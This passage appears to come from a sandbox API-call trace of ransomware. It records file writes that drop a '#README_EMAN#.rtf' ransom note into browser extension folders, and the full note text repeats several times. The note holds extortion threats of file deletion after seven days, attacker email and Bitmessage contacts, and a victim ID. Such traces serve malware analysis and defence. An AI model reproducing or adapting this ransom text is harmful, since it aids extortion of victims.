\\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n=typeof b)return b;try{\x03\x1e", lpUsedDefaultChar=0x0) returned 8717 [0283.729] WriteFile (in: hFile=0x2cc, lpBuffer=0x245c778*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x245c778*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0283.729] CloseHandle (hObject=0x2cc) returned 1 [0283.730] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\#readme_eman#.rtf")) returned 0xffffffff [0283.730] GetLastError () returned 0x2 [0283.730] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0283.731] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0283.731] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0283.731] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x245c778, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third 